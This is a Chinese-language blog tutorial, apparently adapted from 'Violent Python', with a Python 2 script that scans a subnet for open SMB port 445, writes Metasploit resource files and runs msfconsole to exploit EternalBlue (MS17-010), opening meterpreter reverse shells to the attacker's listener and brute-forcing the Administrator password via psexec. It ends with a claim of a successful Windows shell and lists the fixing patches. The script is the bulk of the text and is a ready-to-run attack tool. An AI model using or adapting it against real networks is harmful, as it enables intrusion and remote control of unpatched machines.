python结合metasploit渗透攻击
本文教你如何使用python调用metasploit攻击永恒之蓝漏洞
一、渗透攻击-攻击脚本
#! /usr/bin/env python
#-*- coding:utf-8 -*-
'''
Created on 15 November 2019

@author: perilong

Drives msfconsole from Python: scans a subnet for hosts with TCP/445 open,
writes the corresponding Metasploit commands into a resource (.rc) file and
launches msfconsole on it.  The only module the script actually exercises in
its __main__ block is ms17_010_eternalblue; the page lists the patches that
close that issue (KB4012212 for Win7, KB4012215 for Win8/Server), so a
patched host is not expected to be affected.

NOTE(review): this is Python 2 code (print statements); `nmap` here is the
third-party python-nmap package, not the nmap binary itself.
'''

import nmap
import os
import optparse


# Scan the subnet for every IP address with TCP port 445 open.
def findTgts(subNet):
    """Return the hosts in *subNet* whose TCP port 445 reports state 'open'.

    Args:
        subNet: target specification handed straight to nmap (e.g. a range).

    Returns:
        list of host strings as reported by nmap; empty when nothing matched.
    """
    nmScan = nmap.PortScanner()
    nmScan.scan(subNet, '445')
    tgtHosts = []
    for host in nmScan.all_hosts():
        # has_tcp guards the dict lookup below; hosts without a 445 entry are skipped.
        if nmScan[host].has_tcp(445):
            state = nmScan[host]['tcp'][445]['state']
            if state == 'open':
                print '[+] Found Target Host: '+host
                tgtHosts.append(host)
    return tgtHosts

# Write the multi/handler listener setup into the resource file.
def setupHandler(configFile, lhost, lport):
    """Append the msfconsole commands that start a reverse-TCP listener.

    Args:
        configFile: open writable file object for the .rc script.
        lhost: listen address, written verbatim.
        lport: listen port; passed through str(), so None becomes 'set LPORT None'.
    """
    configFile.write('use exploit/multi/handler\n')
    configFile.write('set payload generic/shell_reverse_tcp\n')
    configFile.write('set LPORT '+str(lport)+'\n')
    configFile.write('set LHOST '+lhost+'\n')
    configFile.write('exploit -j -z\n')
    # Tells later modules in the same rc file not to spawn their own handler.
    configFile.write('setg DisablePayloadHandler 1\n')


def confickerExploit(configFile, tgtHost, lhost, lport):
    """Append the ms17_010_eternalblue module block for one host.

    NOTE(review): the name is inherited from the book's Conficker example;
    the module written here is ms17_010_eternalblue, not the Conficker one.

    Args:
        configFile: open writable file object for the .rc script.
        tgtHost: value for RHOSTS.
        lhost, lport: values for LHOST / LPORT (lport is str()-converted).
    """
    configFile.write('use exploit/windows/smb/ms17_010_eternalblue \n')
    configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp \n')
    configFile.write('set RHOSTS '+tgtHost+'\n')
    configFile.write('set LHOST '+lhost+' \n')
    configFile.write('set LPORT '+str(lport)+' \n')
    configFile.write('exploit -j -z\n')

# Known-credential or password-list attempt over SMB (psexec module).
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
    """Append one psexec module block per line of *passwdFile*.

    The user name is fixed to 'Administrator'; each candidate password is
    read from the file with trailing CR/LF stripped.

    NOTE(review): the password file handle `pF` is never closed; a `with`
    block would release it.

    Args:
        configFile: open writable file object for the .rc script.
        tgtHost: value for RHOSTS.
        passwdFile: path of a text file, one password per line.
        lhost, lport: values for LHOST / LPORT.
    """
    username = 'Administrator'
    pF = open(passwdFile, 'r')
    for password in pF.readlines():
        password = password.strip('\n').strip('\r')
        configFile.write('use exploit/windows/smb/psexec\n')
        configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
        configFile.write('set SMBUser '+str(username)+'\n')
        configFile.write('set SMBPass '+str(password)+'\n')
        configFile.write('set RHOSTS '+tgtHost+'\n')
        configFile.write('set LHOST '+lhost+' \n')
        configFile.write('set LPORT '+str(lport)+' \n')
        configFile.write('exploit -j -z\n')

# Vulnerability exploit block used by the __main__ section below.
def setupHandler1(configFile, rhosts, lhost, lport):
    """Append an ms17_010_eternalblue block that runs in the foreground.

    Unlike confickerExploit this writes a plain `exploit` (no -j -z), so
    msfconsole blocks on the module instead of backgrounding the job.

    Args:
        configFile: open writable file object for the .rc script.
        rhosts: value for RHOSTS, written verbatim.
        lhost, lport: values for LHOST / LPORT.
    """
    configFile.write('use exploit/windows/smb/ms17_010_eternalblue \n')
    configFile.write('set RHOSTS '+rhosts+'\n')
    configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp \n')
    configFile.write('set LHOST '+lhost+' \n')
    configFile.write('set LPORT '+str(lport)+' \n')
    configFile.write('exploit \n')

# Command-line driven entry point (currently commented out in __main__).
def main():
    """Parse -H/-l/-p/-F, build meta.rc from the scan results and run msfconsole.

    NOTE(review): meta.rc is opened before the arguments are validated, so the
    usage path (exit(0)) leaves an empty, unclosed meta.rc behind.
    """
    configFile = open('meta.rc', 'w')
    parser = optparse.OptionParser('[-] Usage%prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
    parser.add_option('-H',dest='tgtHost',type='string',help='specify the target address[es]')
    parser.add_option('-p',dest='lport',type='string',help='specify the listen port')
    parser.add_option('-l',dest='lhost',type='string',help='specify the listen address')
    parser.add_option('-F',dest='passwdFile',type='string',help='Password file for SMB brute force attempt')
    (options, args) = parser.parse_args()
    # Bitwise `|` on two bools; works here but `or` is the idiomatic form.
    if (options.tgtHost==None) | (options.lhost==None):
        print parser.usage
        exit(0)
    lhost = options.lhost
    lport = options.lport
    if lport == None:
        # NOTE(review): `==` is a comparison, not an assignment, so this line
        # has no effect and lport stays None when -p is omitted.
        lport == '1337'
    passwdFile = options.passwdFile
    tgtHosts = findTgts(options.tgtHost)
    setupHandler(configFile, lhost, lport)
    for tgtHost in tgtHosts:
        confickerExploit(configFile, tgtHost, lhost, lport)
        if passwdFile != None:
            smbBrute(configFile, tgtHost, passwdFile, lhost, lport)
    configFile.close()
    # Fixed command string, no user input interpolated.
    os.system('msfconsole -r meta.rc')

if __name__ == '__main__':
    # main()

    # The author's lab addresses; the scan result is only used as a loop
    # counter -- `target` is never read, RHOSTS is the fixed address below,
    # and the rc file is rewritten and msfconsole re-run on every iteration.
    targets = findTgts('10.68.16.1-254')
    for target in targets:
        configFile = open('/home/perilong.rc', 'w')
        setupHandler1(configFile, '10.68.16.104', '10.68.16.110', 5556)
        configFile.close()
        # NOTE(review): as extracted, this string literal is unterminated
        # (closing quote missing), so the listing does not parse as shown.
        os.system('msfconsole -r /home/perilong.rc)
1、端口扫描结束后自动写入攻击脚本并进入攻击
2、攻击进行中
3、攻击成功
进入windows shell
本文靶机信息:
漏洞补丁:
win7: KB4012212
win8-server: KB4012215
参考: python绝技